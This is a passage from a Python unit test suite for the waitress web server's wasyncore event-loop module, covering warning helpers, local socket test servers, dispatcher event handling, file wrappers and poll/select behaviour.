If 'quiet' is True, only re-raise the unexpected warnings.
"""
# Clear the warning registry of the calling module
# in order to re-raise the warnings.
frame = sys._getframe(2)
registry = frame.f_globals.get('__warningregistry__')
if registry:
registry.clear()
with warnings.catch_warnings(record=True) as w:
# Set filter "always" to record all warnings. Because
# test_warnings swap the module, we need to look up in
# the sys.modules dictionary.
sys.modules['warnings'].simplefilter("always")
yield WarningsRecorder(w)
# Filter the recorded warnings
reraise = list(w)
missing = []
for msg, cat in filters:
seen = False
for w in reraise[:]:
warning = w.message
# Filter out the matching messages
if (re.match(msg, str(warning), re.I) and
issubclass(warning.__class__, cat)):
seen = True
reraise.remove(w)
if not seen and not quiet:
# This filter caught nothing
missing.append((msg, cat.__name__))
if reraise:
raise AssertionError("unhandled warning %s" % reraise[0])
if missing:
raise AssertionError("filter (%r, %s) did not catch any warning" %
missing[0])
@contextlib.contextmanager
def check_warnings(*filters, **kwargs): # pragma: no cover
"""Context manager to silence warnings.
Accept 2-tuples as positional arguments:
("message regexp", WarningCategory)
Optional argument:
- if 'quiet' is True, it does not fail if a filter catches nothing
(default True without argument,
default False if some filters are defined)
Without argument, it defaults to:
check_warnings(("", Warning), quiet=True)
"""
quiet = kwargs.get('quiet')
if not filters:
filters = (("", Warning),)
# Preserve backward compatibility
if quiet is None:
quiet = True
return _filterwarnings(filters, quiet)
def gc_collect(): # pragma: no cover
"""Force as many objects as possible to be collected.
In non-CPython implementations of Python, this is needed because timely
deallocation is not guaranteed by the garbage collector. (Even in CPython
this can be the case in case of reference cycles.) This means that __del__
methods may be called later than expected and weakrefs may remain alive for
longer than expected. This function tries its best to force all garbage
objects to disappear.
"""
gc.collect()
if sys.platform.startswith('java'):
time.sleep(0.1)
gc.collect()
gc.collect()
def threading_setup(): # pragma: no cover
return (compat.thread._count(), None)
def threading_cleanup(*original_values): # pragma: no cover
global environment_altered
_MAX_COUNT = 100
for count in range(_MAX_COUNT):
values = (compat.thread._count(), None)
if values == original_values:
break
if not count:
# Display a warning at the first iteration
environment_altered = True
sys.stderr.write(
"Warning -- threading_cleanup() failed to cleanup "
"%s threads" % (values[0] - original_values[0])
)
sys.stderr.flush()
values = None
time.sleep(0.01)
gc_collect()
def reap_threads(func): # pragma: no cover
"""Use this function when threads are being used. This will
ensure that the threads are cleaned up even when the test fails.
"""
@functools.wraps(func)
def decorator(*args):
key = threading_setup()
try:
return func(*args)
finally:
threading_cleanup(*key)
return decorator
def join_thread(thread, timeout=30.0): # pragma: no cover
"""Join a thread. Raise an AssertionError if the thread is still alive
after timeout seconds.
"""
thread.join(timeout)
if thread.is_alive():
msg = "failed to join the thread in %.1f seconds" % timeout
raise AssertionError(msg)
def bind_port(sock, host=HOST): # pragma: no cover
"""Bind the socket to a free port and return the port number. Relies on
ephemeral ports in order to ensure we are using an unbound port. This is
important as many tests may be running simultaneously, especially in a
buildbot environment. This method raises an exception if the sock.family
is AF_INET and sock.type is SOCK_STREAM, *and* the socket has SO_REUSEADDR
or SO_REUSEPORT set on it. Tests should *never* set these socket options
for TCP/IP sockets. The only case for setting these options is testing
multicasting via multiple UDP sockets.
Additionally, if the SO_EXCLUSIVEADDRUSE socket option is available (i.e.
on Windows), it will be set on the socket. This will prevent anyone else
from bind()'ing to our host/port for the duration of the test.
"""
if sock.family == socket.AF_INET and sock.type == socket.SOCK_STREAM:
if hasattr(socket, 'SO_REUSEADDR'):
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR) == 1:
raise RuntimeError("tests should never set the SO_REUSEADDR " \
"socket option on TCP/IP sockets!")
if hasattr(socket, 'SO_REUSEPORT'):
try:
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT) == 1:
raise RuntimeError(
"tests should never set the SO_REUSEPORT " \
"socket option on TCP/IP sockets!")
except OSError:
# Python's socket module was compiled using modern headers
# thus defining SO_REUSEPORT but this process is running
# under an older kernel that does not support SO_REUSEPORT.
pass
if hasattr(socket, 'SO_EXCLUSIVEADDRUSE'):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
sock.bind((host, 0))
port = sock.getsockname()[1]
return port
@contextlib.contextmanager
def closewrapper(sock): # pragma: no cover
try:
yield sock
finally:
sock.close()
class dummysocket: # pragma: no cover
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
def setblocking(self, yesno):
self.isblocking = yesno
def getpeername(self):
return 'peername'
class dummychannel: # pragma: no cover
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy: # pragma: no cover
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv): # pragma no cover
try:
serv.listen(0)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.time()
while n > 0 and time.time() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_unix_socket(sock, addr): # pragma: no cover
"""Bind a unix socket, raising SkipTest if PermissionError is raised."""
assert sock.family == socket.AF_UNIX
try:
sock.bind(addr)
except PermissionError:
sock.close()
raise unittest.SkipTest('cannot bind AF_UNIX sockets')
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
unlink(addr)
bind_unix_socket(sock, addr)
else:
sock.bind(addr)
if sys.platform.startswith("win"): # pragma: no cover
def _waitfor(func, pathname, waitall=False):
# Perform the operation
func(pathname)
# Now setup the wait loop
if waitall:
dirname = pathname
else:
dirname, name = os.path.split(pathname)
dirname = dirname or '.'
# Check for `pathname` to be removed from the filesystem.
# The exponential backoff of the timeout amounts to a total
# of ~1 second after which the deletion is probably an error
# anyway.
# Testing on an i7@4.3GHz shows that usually only 1 iteration is
# required when contention occurs.
timeout = 0.001
while timeout < 1.0:
# Note we are only testing for the existence of the file(s) in
# the contents of the directory regardless of any security or
# access rights. If we have made it this far, we have sufficient
# permissions to do that much using Python's equivalent of the
# Windows API FindFirstFile.
# Other Windows APIs can fail or give incorrect results when
# dealing with files that are pending deletion.
L = os.listdir(dirname)
if not (L if waitall else name in L):
return
# Increase the timeout and try again
time.sleep(timeout)
timeout *= 2
warnings.warn('tests may fail, delete still pending for ' + pathname,
RuntimeWarning, stacklevel=4)
def _unlink(filename):
_waitfor(os.unlink, filename)
else:
_unlink = os.unlink
def unlink(filename):
try:
_unlink(filename)
except OSError:
pass
def _is_ipv6_enabled(): # pragma: no cover
"""Check whether IPv6 is enabled on this host."""
if compat.HAS_IPV6:
sock = None
try:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.bind(('::1', 0))
return True
except socket.error:
pass
finally:
if sock:
sock.close()
return False
IPV6_ENABLED = _is_ipv6_enabled()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
# def handle_error(self):
# self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_wasyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(
repr(d),
'<waitress.wasyncore.dispatcher at %#x>' % id(d)
)
def test_log_info(self):
import logging
inst = asyncore.dispatcher(map={})
logger = DummyLogger()
inst.logger = logger
inst.log_info('message', 'warning')
self.assertEqual(logger.messages, [(logging.WARN, 'message')])
def test_log(self):
import logging
inst = asyncore.dispatcher()
logger = DummyLogger()
inst.logger = logger
inst.log('message')
self.assertEqual(logger.messages, [(logging.DEBUG, 'message')])
def test_unhandled(self):
import logging
inst = asyncore.dispatcher()
logger = DummyLogger()
inst.logger = logger
inst.handle_expt()
inst.handle_read()
inst.handle_write()
inst.handle_connect()
expected = [(logging.WARN, 'unhandled incoming priority event'),
(logging.WARN, 'unhandled read event'),
(logging.WARN, 'unhandled write event'),
(logging.WARN, 'unhandled connect event')]
self.assertEqual(logger.messages, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send): # pragma: no cover
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0: # pragma: no cover
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
join_thread(t, timeout=TIMEOUT)
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(TESTFN, 'wb') as file:
file.write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(TESTFN, 'rb') as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
got_warning = False
while got_warning is False:
# we try until we get the outcome we want because this
# test is not deterministic (gc_collect() may not
fd = os.open(TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
try:
with check_warnings(('', compat.ResourceWarning)):
f = None
gc_collect()
except AssertionError: # pragma: no cover
pass
else:
got_warning = True
def test_close_twice(self):
fd = os.open(TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
os.close(f.fd) # file_wrapper dupped fd
with self.assertRaises(OSError):
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
class BaseTestHandler(asyncore.dispatcher): # pragma: no cover
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self): # pragma: no cover
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all(ignore_all=True)
def loop_waiting_for_flag(self, instance, timeout=5): # pragma: no cover
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b'x' * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b'\0' * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self): # pragma: no cover
# needs to exist for MacOS testing
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll: # pragma: no cover
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(
compat.tobytes(chr(244)), socket.MSG_OOB
)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else: # pragma: no cover
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
#self.assertEqual(s.socket.type, socket.SOCK_STREAM)
self.assertEqual(s.socket.family, self.family)
self.assertEqual(s.socket.gettimeout(), 0)
#self.assertFalse(s.socket.get_inheritable())
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(socket.error, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self): # pragma: no cover
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
with closewrapper(socket.socket(self.family)) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
@reap_threads
def test_quick_connect(self): # pragma: no cover
# see: http://bugs.python.org/issue10340
if self.family not in (socket.AF_INET,
getattr(socket, "AF_INET6", object())):
self.skipTest("test specific to AF_INET and AF_INET6")
server = BaseServer(self.family, self.addr)
# run the thread 500 ms: the socket should be connected in 200 ms
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
count=5))
t.start()
try:
sock = socket.socket(self.family, socket.SOCK_STREAM)
with closewrapper(sock) as s:
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except OSError:
pass
finally:
join_thread(t, timeout=TIMEOUT)
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (HOST, 0)
@unittest.skipUnless(IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = TESTFN
def tearDown(self):
unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
class Test__strerror(unittest.TestCase):
def _callFUT(self, err):
from waitress.wasyncore import _strerror
return _strerror(err)
def test_gardenpath(self):
self.assertEqual(self._callFUT(1), 'Operation not permitted')
def test_unknown(self):
self.assertEqual(self._callFUT('wut'), 'Unknown error wut')
class Test_read(unittest.TestCase):
def _callFUT(self, dispatcher):
from waitress.wasyncore import read
return read(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.read_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from waitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow,self._callFUT, inst)
self.assertTrue(inst.read_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.error_handled)
class Test_write(unittest.TestCase):
def _callFUT(self, dispatcher):
from waitress.wasyncore import write
return write(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.write_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from waitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow,self._callFUT, inst)
self.assertTrue(inst.write_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.write_event_handled)
self.assertTrue(inst.error_handled)
class Test__exception(unittest.TestCase):
def _callFUT(self, dispatcher):
from waitress.wasyncore import _exception
return _exception(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.expt_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from waitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow,self._callFUT, inst)
self.assertTrue(inst.expt_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.expt_event_handled)
self.assertTrue(inst.error_handled)
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class Test_readwrite(unittest.TestCase):
def _callFUT(self, obj, flags):
from waitress.wasyncore import readwrite
return readwrite(obj, flags)
def test_handle_read_event(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
def test_handle_write_event(self):
flags = 0
flags |= select.POLLOUT
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.write_event_handled)
def test_handle_expt_event(self):
flags = 0
flags |= select.POLLPRI
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.expt_event_handled)
def test_handle_close(self):
flags = 0
flags |= select.POLLHUP
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.close_handled)
def test_socketerror_not_in_disconnected(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(socket.error(errno.EALREADY, 'EALREADY'))
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.error_handled)
def test_socketerror_in_disconnected(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(socket.error(errno.ECONNRESET, 'ECONNRESET'))
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.close_handled)
def test_exception_in_reraised(self):
from waitress import wasyncore
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(wasyncore.ExitNow)
self.assertRaises(wasyncore.ExitNow, self._callFUT, inst, flags)
self.assertTrue(inst.read_event_handled)
def test_exception_not_in_reraised(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(ValueError)
self._callFUT(inst, flags)
self.assertTrue(inst.error_handled)
class Test_poll(unittest.TestCase):
def _callFUT(self, timeout=0.0, map=None):
from waitress.wasyncore import poll
return poll(timeout, map)
def test_nothing_writable_nothing_readable_but_map_not_empty(self):
# i read the mock.patch docs. nerp.
dummy_time = DummyTime()
map = {0:DummyDispatcher()}
try:
from waitress import wasyncore
old_time = wasyncore.time
wasyncore.time = dummy_time
result = self._callFUT(map=map)
finally:
wasyncore.time = old_time
self.assertEqual(result, None)
self.assertEqual(dummy_time.sleepvals, [0.0])
def test_select_raises_EINTR(self):
# i read the mock.patch docs. nerp.
dummy_select = DummySelect(select.error(errno.EINTR))
disp = DummyDispatcher()
disp.readable = lambda: True
map = {0:disp}
try:
from waitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
result = self._callFUT(map=map)
finally:
wasyncore.select = old_select
self.assertEqual(result, None)
self.assertEqual(dummy_select.selected, [([0], [], [0], 0.0)])
def test_select_raises_non_EINTR(self):
# i read the mock.patch docs. nerp.
dummy_select = DummySelect(select.error(errno.EBADF))
disp = DummyDispatcher()
disp.readable = lambda: True
map = {0:disp}
try:
from waitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self.assertRaises(select.error, self._callFUT, map=map)
finally:
wasyncore.select = old_select
self.assertEqual(dummy_select.selected, [([0], [], [0], 0.0)])
class Test_poll2(unittest.TestCase):
def _callFUT(self, timeout=0.0, map=None):
from waitress.wasyncore import poll2
return poll2(timeout, map)
def test_select_raises_EINTR(self):
# i read the mock.patch docs. nerp.
pollster = DummyPollster(exc=select.error(errno.EINTR))
dummy_select = DummySelect(pollster=pollster)
disp = DummyDispatcher()
map = {0:disp}
try:
from waitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self._callFUT(map=map)
finally:
wasyncore.select = old_select
self.assertEqual(pollster.polled, [0.0])
def test_select_raises_non_EINTR(self):
# i read the mock.patch docs. nerp.
pollster = DummyPollster(exc=select.error(errno.EBADF))
dummy_select = DummySelect(pollster=pollster)
